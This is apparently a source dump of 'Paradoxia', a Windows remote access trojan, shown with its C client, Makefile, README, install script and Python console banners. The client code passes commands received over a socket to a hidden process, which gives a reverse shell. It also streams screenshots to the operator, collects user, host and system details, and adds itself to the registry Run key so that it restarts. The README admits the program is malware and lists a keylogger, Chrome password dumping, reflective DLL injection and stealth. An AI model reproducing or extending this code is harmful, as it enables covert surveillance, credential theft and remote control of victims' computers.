paradoxia.c ParadoxiaClient.c sys.c LoadLibraryR.c GetProcAddressR.c -o $(OUTFILE) -lws2_32 -static -liphlpapi -m32 -mwindows -lwinmm -lpsapi -lwininet -lshlwapi -MD -s -O3 20 | make icon: 21 | $(WINDRES) icon.rc -O coff -o icon.res -F pe-i386 22 | $(COMPILER) main.c paradoxia.c ParadoxiaClient.c sys.c LoadLibraryR.c GetProcAddressR.c -o $(OUTFILE) icon.res -lws2_32 -static -liphlpapi -m32 -mwindows -lwinmm -lpsapi -lwininet -lshlwapi -MD -s -O3 23 | clean: 24 | $(del) *.d 25 | $(del) *.exe 26 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/paradoxia.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Fahad (QuantumCore) 3 | paradoxia.c (c) 2020 4 | Created: 2020-08-15T15:27:04.427Z 5 | Modified: - 6 | */ 7 | 8 | /* 9 | Have a good time reading the source. You're an amazing person. 10 | If you decide to copy, Don't forget to give me credit. 11 | */ 12 | 13 | 14 | #include "paradoxia.h" 15 | 16 | // Awesome! 17 | 18 | void TimeStamp(char buffer[100]) 19 | { 20 | time_t t = time(0); 21 | struct tm* now = localtime(&t); 22 | memset(buffer, '\0', 100); 23 | strftime(buffer, 100, "%Y-%m-%d-%S", now); 24 | } 25 | 26 | void ReportError(void) 27 | { 28 | printf("Error : %ld\n", GetLastError()); 29 | } 30 | 31 | void WSAReportError(void) 32 | { 33 | printf("Error : %ld\n", WSAGetLastError()); 34 | } 35 | 36 | 37 | void split(char* src, char* dest[5], const char* delimeter) { 38 | // Only split if delimeter does exist in the source string 39 | if (strstr(src, delimeter) != NULL) 40 | { 41 | int i = 0; 42 | char* p = strtok(src, delimeter); 43 | while (p != NULL) 44 | { 45 | dest[i++] = p; 46 | p = strtok(NULL, delimeter); 47 | } 48 | } 49 | } 50 | 51 | void ExecSock(SOCKET sockfd, char recvbuf[BUFFER]) 52 | { 53 | STARTUPINFO sinfo; 54 | PROCESS_INFORMATION pinfo; 55 | memset(&sinfo, 0, sizeof(sinfo)); 56 | sinfo.cb = sizeof(sinfo); 57 | sinfo.dwFlags = STARTF_USESTDHANDLES; 58 | sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sockfd; 59 | if (CreateProcess(NULL, (LPSTR)recvbuf, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo)) { 60 | WaitForSingleObject(pinfo.hProcess, INFINITE); 61 | CloseHandle(pinfo.hProcess); 62 | CloseHandle(pinfo.hThread); 63 | } 64 | else { 65 | sockprintf("Failed to Create Process, Error : %ld\n", GetLastError()); 66 | } 67 | } 68 | DWORD ProcessId(LPCTSTR ProcessName) 69 | { 70 | PROCESSENTRY32 pt; 71 | HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 72 | pt.dwSize = sizeof(PROCESSENTRY32); 73 | if (Process32First(hsnap, &pt)) { 74 | do { 75 | if (!lstrcmpi(pt.szExeFile, ProcessName)) { 76 | CloseHandle(hsnap); 77 | return pt.th32ProcessID; 78 | } 79 | } while (Process32Next(hsnap, &pt)); 80 | } 81 | CloseHandle(hsnap); 82 | return 0; 83 | } 84 | 85 | int CaptureAnImage(HWND hWnd, SOCKET sockfd) 86 | { 87 | HDC hdcScreen; 88 | HDC hdcWindow; 89 | HDC hdcMemDC = NULL; 90 | HBITMAP hbmScreen = NULL; 91 | BITMAP bmpScreen; 92 | char buffer[100]; 93 | // Retrieve the handle to a display device context for the client 94 | // area of the window. 95 | hdcScreen = GetDC(NULL); 96 | hdcWindow = GetDC(hWnd); 97 | 98 | // Create a compatible DC which is used in a BitBlt from the window DC 99 | hdcMemDC = CreateCompatibleDC(hdcWindow); 100 | 101 | if (!hdcMemDC) 102 | { 103 | sockprintf( "CreateCompatibleDC has failed Error %i", GetLastError()); 104 | goto done; 105 | } 106 | 107 | // Get the client area for size calculation 108 | RECT rcClient; 109 | GetClientRect(hWnd, &rcClient); 110 | 111 | //This is the best stretch mode 112 | SetStretchBltMode(hdcWindow, HALFTONE); 113 | 114 | //The source DC is the entire screen and the destination DC is the current window (HWND) 115 | if (!StretchBlt(hdcWindow, 116 | 0, 0, 117 | rcClient.right, rcClient.bottom, 118 | hdcScreen, 119 | 0, 0, 120 | GetSystemMetrics(SM_CXSCREEN), 121 | GetSystemMetrics(SM_CYSCREEN), 122 | SRCCOPY)) 123 | { 124 | sockprintf( "StretchBlt has failed Error %i", GetLastError()); 125 | goto done; 126 | } 127 | 128 | // Create a compatible bitmap from the Window DC 129 | hbmScreen = CreateCompatibleBitmap(hdcWindow, rcClient.right - rcClient.left, rcClient.bottom - rcClient.top); 130 | 131 | if (!hbmScreen) 132 | { 133 | sockprintf( "CreateCompatibleBitmap Failed Error %i", GetLastError()); 134 | goto done; 135 | } 136 | 137 | // Select the compatible bitmap into the compatible memory DC. 138 | SelectObject(hdcMemDC, hbmScreen); 139 | 140 | // Bit block transfer into our compatible memory DC. 141 | if (!BitBlt(hdcMemDC, 142 | 0, 0, 143 | rcClient.right - rcClient.left, rcClient.bottom - rcClient.top, 144 | hdcWindow, 145 | 0, 0, 146 | SRCCOPY)) 147 | { 148 | sockprintf( "BitBlt has failed Error %i", GetLastError()); 149 | goto done; 150 | } 151 | 152 | // Get the BITMAP from the HBITMAP 153 | GetObject(hbmScreen, sizeof(BITMAP), &bmpScreen); 154 | 155 | BITMAPFILEHEADER bmfHeader; 156 | BITMAPINFOHEADER bi; 157 | 158 | bi.biSize = sizeof(BITMAPINFOHEADER); 159 | bi.biWidth = bmpScreen.bmWidth; 160 | bi.biHeight = bmpScreen.bmHeight; 161 | bi.biPlanes = 1; 162 | bi.biBitCount = 32; 163 | bi.biCompression = BI_RGB; 164 | bi.biSizeImage = 0; 165 | bi.biXPelsPerMeter = 0; 166 | bi.biYPelsPerMeter = 0; 167 | bi.biClrUsed = 0; 168 | bi.biClrImportant = 0; 169 | 170 | DWORD dwBmpSize = ((bmpScreen.bmWidth * bi.biBitCount + 31) / 32) * 4 * bmpScreen.bmHeight; 171 | 172 | // Starting with 32-bit Windows, GlobalAlloc and LocalAlloc are implemented as wrapper functions that 173 | // call HeapAlloc using a handle to the process's default heap. Therefore, GlobalAlloc and LocalAlloc 174 | // have greater overhead than HeapAlloc. 175 | HANDLE hDIB = GlobalAlloc(GHND, dwBmpSize); 176 | char* lpbitmap = (char*)GlobalLock(hDIB); 177 | 178 | // Gets the "bits" from the bitmap and copies them into a buffer 179 | // which is pointed to by lpbitmap. 180 | GetDIBits(hdcWindow, hbmScreen, 0, 181 | (UINT)bmpScreen.bmHeight, 182 | lpbitmap, 183 | (BITMAPINFO*)&bi, DIB_RGB_COLORS); 184 | 185 | // A file is created, this is where we will save the screen capture. 186 | /* HANDLE hFile = CreateFile(L"captureqwsx.bmp", 187 | GENERIC_WRITE, 188 | 0, 189 | NULL, 190 | CREATE_ALWAYS, 191 | FILE_ATTRIBUTE_NORMAL, NULL); 192 | */ 193 | // Add the size of the headers to the size of the bitmap to get the total file size 194 | DWORD dwSizeofDIB = dwBmpSize + sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER); 195 | 196 | //Offset to where the actual bitmap bits start. 197 | bmfHeader.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER); 198 | 199 | //Size of the file 200 | bmfHeader.bfSize = dwSizeofDIB; 201 | 202 | //bfType must always be BM for Bitmaps 203 | bmfHeader.bfType = 0x4D42; //BM 204 | 205 | TimeStamp(buffer); 206 | sockprintf( "SCREENSHOT:%s.bmp:%i", buffer, sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwBmpSize); 207 | Sleep(1000); 208 | DWORD dwBytesWritten = 0; 209 | WriteFile((HANDLE)sockfd, (LPSTR)&bmfHeader, sizeof(BITMAPFILEHEADER), &dwBytesWritten, NULL); 210 | WriteFile((HANDLE)sockfd, (LPSTR)&bi, sizeof(BITMAPINFOHEADER), &dwBytesWritten, NULL); 211 | WriteFile((HANDLE)sockfd, (LPSTR)lpbitmap, dwBmpSize, &dwBytesWritten, NULL); 212 | 213 | //Unlock and Free the DIB from the heap 214 | GlobalUnlock(hDIB); 215 | GlobalFree(hDIB); 216 | 217 | //Close the handle for the file that was created 218 | // CloseHandle(hFile); 219 | 220 | //Clean up 221 | done: 222 | if (hbmScreen) { 223 | DeleteObject(hbmScreen); 224 | } 225 | 226 | if (hdcMemDC) { 227 | DeleteObject(hdcMemDC); 228 | } 229 | 230 | ReleaseDC(NULL, hdcScreen); 231 | ReleaseDC(hWnd, hdcWindow); 232 | 233 | return 0; 234 | } 235 | 236 | char* appDataPath() 237 | { 238 | static char szPath[MAX_PATH]; 239 | if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_APPDATA | CSIDL_FLAG_CREATE, NULL, 0, szPath))){ 240 | return szPath; 241 | } else { 242 | return "C:\\Users\\Public"; // If We are unable to get the AppData/Romaing path, Use Public $HOME folder for installation 243 | } 244 | } 245 | 246 | 247 | 248 | void StartupKey(const char* czExePath) 249 | { 250 | HKEY hKey; 251 | LONG lnRes = RegOpenKeyEx( HKEY_CURRENT_USER, 252 | "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 253 | 0 , KEY_WRITE, 254 | &hKey); 255 | if( ERROR_SUCCESS == lnRes ) 256 | { 257 | lnRes = RegSetValueEx( hKey, 258 | INSTALL_FOLDER_NAME, 259 | 0, 260 | REG_SZ, 261 | czExePath, 262 | strlen(czExePath)); 263 | } 264 | 265 | RegCloseKey(hKey); 266 | } 267 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/paradoxia.h: -------------------------------------------------------------------------------- 1 | #ifndef __PARADOXIA__H__ 2 | #define __PARADOXIA__H__ 3 | /* 4 | Author: Fahad (QuantumCore) 5 | paradoxia.h (c) 2020 6 | Desc: Main header file 7 | Created: 2020-08-15T15:27:04.427Z 8 | Modified: - 9 | */ 10 | 11 | 12 | // This is the maalik client modified to work as a RAT client for paradoxia. 13 | // Changes : 14 | // Some new commands added. 15 | // Built in Keylogger. 16 | // Built in Chrome Dump. 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | #define INSTALL_NAME "{{installname}}" 30 | #define INSTALL_FOLDER_NAME "{{installdir}}" 31 | 32 | 33 | #pragma comment(lib, "ws2_32.lib") 34 | #pragma comment(lib, "iphlpapi.lib") 35 | #pragma comment(lib, "advapi32.lib") 36 | #pragma comment(lib, "wininet.lib") 37 | #pragma comment(lib, "shlwapi.lib") 38 | #pragma comment(lib, "winmm.lib") 39 | 40 | #define BUFFER 1024 41 | static BOOL connected = FALSE; 42 | 43 | 44 | //===================== 45 | void ReportError(void); 46 | void WSAReportError(void); 47 | char* appDataPath(); 48 | int CaptureAnImage(HWND hWnd, SOCKET sockfd); 49 | void TimeStamp(char buffer[100]); 50 | BOOL IsAdmin(); 51 | void OS(); 52 | void ramsize(int mode); 53 | void SYSTEMINFO(int mode); 54 | //===================== 55 | void sockprintf(const char* words, ...); 56 | char* ParadoxiaInfo(); 57 | BOOL isFile(const char* file); 58 | void UserPC(); 59 | void EternalBlueScan(const char* host); 60 | char* cDir(); 61 | // Start Winsock 62 | void StartWSA(void); 63 | void StartupKey(const char* czExePath); 64 | void paradoxia_main(void); 65 | void MainConnect(void); 66 | void sockSend(const char* data); 67 | DWORD ProcessId(LPCTSTR ProcessName); 68 | void ExecSock(SOCKET sockfd, char recvbuf[BUFFER]); 69 | static int process_row(void* passed_db, int argc, char** argv, char** col_name); 70 | static int fill_secret_file(char* url, char* username, unsigned char* password); 71 | void split(char* src, char* dest[5], const char* delimeter); 72 | void REConnect(); 73 | 74 | #endif //!__paradoxia__H__ -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/sys.c: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | Author: Fahad (QuantumCore) 4 | sys.c (c) 2020 5 | Created: 2020-08-15T15:27:04.427Z 6 | Modified: - 7 | */ 8 | 9 | /* 10 | Have a good time reading the source. You're an amazing person. 11 | If you decide to copy, Don't forget to give me credit. 12 | */ 13 | 14 | #include "paradoxia.h" 15 | // This may be useful somewhere 16 | BOOL isFile(const char* file) 17 | { 18 | DWORD dwAttrib = GetFileAttributes(file); 19 | 20 | return (dwAttrib != INVALID_FILE_ATTRIBUTES && 21 | !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 22 | } 23 | 24 | // TODO : Add Error handlng 25 | void UserPC() 26 | { 27 | char username[UNLEN + 1]; 28 | char hostname[MAX_COMPUTERNAME_LENGTH + 1]; 29 | DWORD len = UNLEN + 1; 30 | DWORD hlen = sizeof(hostname) / sizeof(hostname[0]); 31 | GetUserNameA(username, &len); 32 | GetComputerNameA(hostname, &hlen); 33 | sockprintf( "%s / %s", username, hostname); 34 | 35 | } 36 | 37 | 38 | 39 | 40 | char* cDir() 41 | { 42 | static char DIR[MAX_PATH]; 43 | memset(DIR, '\0', MAX_PATH); 44 | GetCurrentDirectory(MAX_PATH, DIR); 45 | return (char*)DIR; 46 | } 47 | 48 | BOOL IsAdmin() { 49 | BOOL fIsRunAsAdmin = FALSE; 50 | DWORD dwError = ERROR_SUCCESS; 51 | PSID pAdministratorsGroup = NULL; 52 | 53 | SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; 54 | if (!AllocateAndInitializeSid(&NtAuthority, 2, 55 | SECURITY_BUILTIN_DOMAIN_RID, 56 | DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) { 57 | dwError = GetLastError(); 58 | 59 | } 60 | else if (!CheckTokenMembership(NULL, pAdministratorsGroup, 61 | &fIsRunAsAdmin)) { 62 | dwError = GetLastError(); 63 | 64 | } 65 | 66 | if (pAdministratorsGroup) { 67 | FreeSid(pAdministratorsGroup); 68 | pAdministratorsGroup = NULL; 69 | } 70 | 71 | return fIsRunAsAdmin; 72 | } 73 | 74 | 75 | char* ParadoxiaInfo() 76 | { 77 | static char DIR[MAX_PATH]; 78 | GetModuleFileName(NULL, DIR, MAX_PATH); 79 | return PathFindFileName(DIR); 80 | } 81 | 82 | void OS() 83 | { 84 | int ret = 0.0; 85 | NTSTATUS(WINAPI * RtlGetVersion)(LPOSVERSIONINFOEXW); 86 | OSVERSIONINFOEXW osInfo; 87 | RtlGetVersion = GetProcAddress(GetModuleHandleA("ntdll"), "RtlGetVersion"); 88 | 89 | if (NULL != RtlGetVersion) 90 | { 91 | osInfo.dwOSVersionInfoSize = sizeof osInfo; 92 | RtlGetVersion(&osInfo); 93 | ret = osInfo.dwMajorVersion; 94 | } 95 | int mw = osInfo.dwMinorVersion; 96 | if (ret == 5) { 97 | switch (mw) 98 | { 99 | case 0: 100 | // 5.0 = Windows 2000 101 | sockprintf( "Windows 2000"); 102 | break; 103 | case 1: 104 | // 5.1 = Windows XP 105 | sockprintf( "Windows 2000"); 106 | break; 107 | 108 | case 2: 109 | sockprintf( "Windows XP Professional"); 110 | break; 111 | 112 | default: 113 | sockprintf( "Windows %i", mw); 114 | break; 115 | } 116 | } 117 | else if (ret == 6) { 118 | switch (mw) 119 | { 120 | case 0: 121 | sockprintf( "Windows Vista"); 122 | break; 123 | case 1: 124 | sockprintf( "Windows 7"); 125 | break; 126 | case 2: 127 | sockprintf( "Windows 8"); 128 | break; 129 | case 3: 130 | sockprintf( "Windows 8.1"); 131 | break; 132 | 133 | default: 134 | sockprintf( "Windows %i", mw); 135 | break; 136 | } 137 | } 138 | else if (ret == 10) { 139 | sockprintf( "Windows 10"); 140 | } 141 | else { 142 | 143 | sockprintf( "Windows %i", mw); 144 | } 145 | } 146 | 147 | 148 | void SYSTEMINFO(int mode) { 149 | SYSTEM_INFO info; 150 | GetSystemInfo(&info); 151 | switch (mode) 152 | { 153 | case 0: 154 | sockprintf( "%i", info.dwNumberOfProcessors); 155 | break; 156 | 157 | case 1: 158 | sockprintf( "%i", info.dwPageSize); 159 | break; 160 | 161 | case 2: 162 | sockprintf( "%i", info.lpMinimumApplicationAddress); 163 | break; 164 | 165 | case 3: 166 | sockprintf( "%i", info.lpMaximumApplicationAddress); 167 | break; 168 | 169 | default: 170 | break; 171 | } 172 | } 173 | 174 | 175 | void ramsize(int mode) 176 | { 177 | MEMORYSTATUSEX memstatx; 178 | memstatx.dwLength = sizeof(memstatx); 179 | GlobalMemoryStatusEx(&memstatx); 180 | float ramsize = memstatx.ullTotalPhys / (1024 * 1024); 181 | float memVrsize = memstatx.ullTotalVirtual / (1024 * 1024); 182 | 183 | if (mode == 1) { 184 | sockprintf( "%f", ramsize); 185 | } 186 | else { 187 | sockprintf( "%f", memVrsize); 188 | } 189 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Paradoxia Remote Access Tool. 5 | 6 | **Are you looking for a GUI alternative? Check out [Remote Hacker Probe](https://github.com/quantumcored/remote_hacker_probe). More Advanced and Stable with ton of features.** 7 | 8 | ### Features 9 | 10 | ##### Paradoxia Console 11 | Feature | Description 12 | --------|------------- 13 | Easy to use | Paradoxia is extremely easy to use, So far the easiest rat! 14 | Root Shell | - 15 | Automatic Client build | Build Paradoxia Client easily with or without the icon of your choice. 16 | Multithreaded | Multithreaded Console server, You can get multiple sessions. 17 | Toast Notifications | Desktop notification on new session 18 | Configurable Settings | Configurable values in ``paradoxia.ini`` 19 | Kill Sessions | Kill Sessions without getting in session. 20 | View Session information | View Session information without getting in Session. 21 | 22 | --- 23 | 24 | ##### Paradoxia Client 25 | Feature | Description 26 | --------|------------- 27 | Stealth | Runs in background. 28 | Full File Access | Full access to the entire file system. 29 | Persistence | Installs inside APPDATA and has startup persistence via Registry key. 30 | Upload / Download Files | Upload and download files. 31 | Screenshot | Take screenshot. 32 | Mic Recording | Record Microphone. 33 | Chrome Password Recovery | Dump Chrome Passwords using Reflective DLL (Does not work on latest version) :shipit: 34 | Keylogger | Log Keystrokes and save to file via Reflective DLL. 35 | Geolocate | Geolocate Paradoxia Client. 36 | Process Info | Get Process information. 37 | DLL Injection | Reflective DLL Injection over Socket, Load your own Reflective DLL, OR use ones available [here](https://github.com/quantumcored/maalik/tree/master/payloads). 38 | Power off | Power off the Client system. 39 | Reboot | Reboot the client system. 40 | MSVC + MINGW Support | Visual studio project is also included. 41 | Reverse Shell | Stable Reverse Shell. 42 | Small Client | Maximum size is 30kb without icon. 43 | 44 | --- 45 | 46 | 47 | ### Installation (via APT) 48 | ```bash 49 | $ git clone https://github.com/quantumcored/paradoxiaRAT 50 | $ cd paradoxiaRAT 51 | $ chmod +x install.sh 52 | $ sudo ./install.sh 53 | ``` 54 | 55 | ### Example Usage : 56 | - Run Paradoxia 57 | ``` 58 | sudo python3 paradoxia.py 59 | ``` 60 | - Once in paradoxia Console, The first step would be to build the Client, Preferably with an Icon. 61 | 62 | ![pd1](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd1.PNG) 63 | 64 | - After that's built, As you can see below it is detected by Windows Defender as a severe malware. Which is expected since it IS malware. 65 | 66 | ![pd2](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd2.PNG) 67 | 68 | - I'm going to transfer the client on a Windows 10 Virtual machine and execute it. After Executing it, It appears under Startup programs in task manager. 69 | 70 | ![pd3](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd3.PNG) 71 | 72 | - Also it has copied itself inside Appdata directory and installed under the name we specified during build. 73 | 74 | ![pdmiss](https://github.com/quantumcored/paradoxiaRAT/blob/master/images/pdmiss.PNG) 75 | 76 | - At the same time, I get a session at server side. 77 | 78 | ![pd4](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd4.PNG) 79 | 80 | - First thing I'd do is get in the session and view information. 81 | 82 | ![pd5](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd5.PNG) 83 | 84 | - There are plenty of things we can do right now, but for example only, I will demonstrate keylogging. 85 | 86 | ![pd6](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd7.PNG) 87 | 88 | You can see in the image above that It says it successfully injected dll, And in file listing there is a file named ``log.log``, Which contains the logged keystrokes. 89 | 90 | - Lets view captured keystrokes. 91 | 92 | ![pd7](https://github.com/quantumcored/paradoxiaRAT/raw/master/images/pd8.PNG) 93 | 94 | 95 | ### Changelogs 96 | - This repository was home to 3 tools previously, [Iris](https://github.com/quantumcored/iris), [Thawne](https://github.com/quantumcored/thawne) and Previous version of Paradoxia. This can be found [here](https://github.com/quantumcored/paradoxiaRAT/tree/930a396cb64744de0d8cd14e55540a97ba9fa452). 97 | - Everything is entirely changed, Client has been rewritten, Infodb removed. Much new features added. Stability added. 98 | 99 | #### Links 100 | - [Setting up Paradoxia on Kali Linux](https://youtu.be/F4TAdWDlR-w) (Old Version, but works) 101 | 102 | #### Developer 103 | Hi my name's [Fahad](https://github.com/quantumcore). 104 | You may contact me, on [Discord](https://discordapp.com/invite/8snh7nx) or [My Website](https://quantumcored.com/) 105 | 106 | #### LICENSE 107 | [VIEW LICENSE](https://github.com/quantumcored/paradoxia/blob/master/LICENSE) 108 | 109 | The Developer is not responsible for any misuse of Damage caused by the program. This is created only to innovate InfoSec and **YOU**. :point_left: 110 | 111 | #### Donate 112 | Help me with my future projects. Thank you. 113 | [Donate with Crypto](https://commerce.coinbase.com/checkout/cebcb394-f73e-4990-98b9-b3fdd852358f) 114 | -------------------------------------------------------------------------------- /blacklist: -------------------------------------------------------------------------------- 1 | # Add Blacklisted IP's here. 2 | -------------------------------------------------------------------------------- /dlls/chrome.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/dlls/chrome.dll -------------------------------------------------------------------------------- /dlls/keylogger.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/dlls/keylogger.dll -------------------------------------------------------------------------------- /dlls/readme.md: -------------------------------------------------------------------------------- 1 | ### DLLS 2 | This folder contains compiled DLLS of ChromeDump and Keylogger. 3 | Source code of these DLLS is available [here](https://github.com/quantumcored/maalik/tree/master/payloads) -------------------------------------------------------------------------------- /images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/logo.png -------------------------------------------------------------------------------- /images/pd1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd1.PNG -------------------------------------------------------------------------------- /images/pd2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd2.PNG -------------------------------------------------------------------------------- /images/pd3.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd3.PNG -------------------------------------------------------------------------------- /images/pd4.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd4.PNG -------------------------------------------------------------------------------- /images/pd5.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd5.PNG -------------------------------------------------------------------------------- /images/pd6.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd6.PNG -------------------------------------------------------------------------------- /images/pd7.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd7.PNG -------------------------------------------------------------------------------- /images/pd8.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pd8.PNG -------------------------------------------------------------------------------- /images/pdmiss.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/paradoxiaRAT/b9249bf7e734fa3f4dd3881958a79eb0c87cb8da/images/pdmiss.PNG -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | clear 2 | if [[ $EUID -ne 0 ]]; then 3 | echo "[^] Run as root." 4 | exit 1 5 | fi 6 | echo "PARADOXIA Installer" 7 | apt-get install mingw-w64 8 | apt-get install python3-pip 9 | pip3 install -r requirements.txt 10 | sleep 1 11 | clear 12 | echo "Done, Now you may run Paradoxia." 13 | -------------------------------------------------------------------------------- /kernel/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Gangsters don't cry, Therefore, Therefore I'm. 4 | Mr Misty Eyes, Therefore, I'm. 5 | 6 | """ -------------------------------------------------------------------------------- /kernel/banner.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Have a good time reading the source. You are an amazing person. 4 | 5 | """ 6 | 7 | from colorama import Fore, Style 8 | import colorama, random 9 | 10 | colorama.init() 11 | 12 | banner = Style.BRIGHT + Fore.CYAN + r""" 13 | ___ ____ ____ ____ ___ ____ _ _ _ ____ 14 | |__] |__| |__/ |__| | \ | | \/ | |__| 15 | | | | | \ | | |__/ |__| _/\_ | | | 16 | 17 | ----------------------------- ------------------------------- 18 | Control is an Illusion 19 | """ + Style.RESET_ALL 20 | 21 | bannertwo = Style.BRIGHT + Fore.YELLOW + r""" 22 | ______________ 23 | ,===:'., `-._ 24 | `:.`---.__ `-._ 25 | Never tell everything `:. `--. `. 26 | you know... \. `. `. 27 | (,,(, \. `. ____,-`., 28 | (,' `/ \. ,--.___`.' 29 | , ,' ,--. `, \.;' ` 30 | `{D, { \ : \; 31 | V,,' / / // 32 | j;; / ,' ,-//. ,---. , 33 | \;' / ,' / _ \ / _ \ ,'/ 34 | \ `' / \ `' / \ `.' / 35 | `.___,' `.__,' `.__,' 36 | """ + Style.RESET_ALL 37 | 38 | bannerthree = Style.BRIGHT + Fore.BLUE + r""" 39 | 40 | |,---"-----------------------------"---,| 41 | ||paradoxia> cat loot/xx/tasklist || 42 | ||Image Name || 43 | ||========================== || 44 | ||System || 45 | ||chrome.exe || 46 | ||winsvchost.exe || 47 | || || 48 | ||_____,_________________________,_____|| 49 | |)_____)-----.| -------- |.------(_____(| 50 | //''''''|_____|=----------=|______|'''''''\\ 51 | // _| _| _| _| _| _| _| _| _| _| _| _| _| _| \ 52 | // ___| _| _| _| _| _| _| _| _| _| _| _| | | \ 53 | |/ ___| _| _| _| _| _| _| _| _| _| _| _| ______| \ 54 | / __| _| _| _| _| _| _| _| _| _| _| _| _| _| ___| \ 55 | / _| _| _| _| ________________________| _| _| _| _| \ 56 | |----------------------------------------------------| 57 | `-----------------------------------------------------' 58 | """ + Style.RESET_ALL 59 | 60 | 61 | bannerfour = Style.BRIGHT + Fore.RED + r""" 62 | 63 | _--_ 64 | / -) 65 | ___/___|___ 66 | ____-----=~~///| ||||~~~==-----_____ 67 | //~////////////~/| |//|||||\\\\\\\\\\\\\ 68 | ////////////////////| |///////|\\\\\\\\\\\\\\\ 69 | /////~~~~~~~~~~~~~~~\ |.||/~~~~~~~~~~~~~~~~~`\\\\\ 70 | //~ /\\|\\ ~\\ 71 | ///W^\W\ 72 | ////|||\\\ 73 | ~~~~~~~~~~ 74 | Injustice anywhere is a threat to Justice everywhere. 75 | 76 | """ + Style.RESET_ALL 77 | bannerfive = Style.BRIGHT + Fore.LIGHTGREEN_EX + r''' 78 | 79 | .o oOOOOOOOo OOOo 80 | Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO 81 | OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO 82 | OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' 83 | `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo 84 | .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO 85 | OOOOO '"OOOOOOOOOOOOOOOO"` oOO 86 | oOOOOOba. .adOOOOOOOOOOba .adOOOOo. 87 | oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO 88 | OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO 89 | "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" 90 | Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` 91 | : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . 92 | . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo 93 | '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': 94 | `$" `OOOO' `O"Y ' `OOOO' o . 95 | . . OP" : o . 96 | : 97 | . 98 | A Devil is at his strongest when we are looking the other way, 99 | like a program running in the background silently, while we are busy doing 100 | other shit. 101 | ''' + Style.RESET_ALL 102 | def pbanner(): 103 | return random.choice([banner, bannertwo, bannerthree, bannerfour, bannerfive]) 104 | -------------------------------------------------------------------------------- /kernel/builder.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Generate Client 4 | 5 | 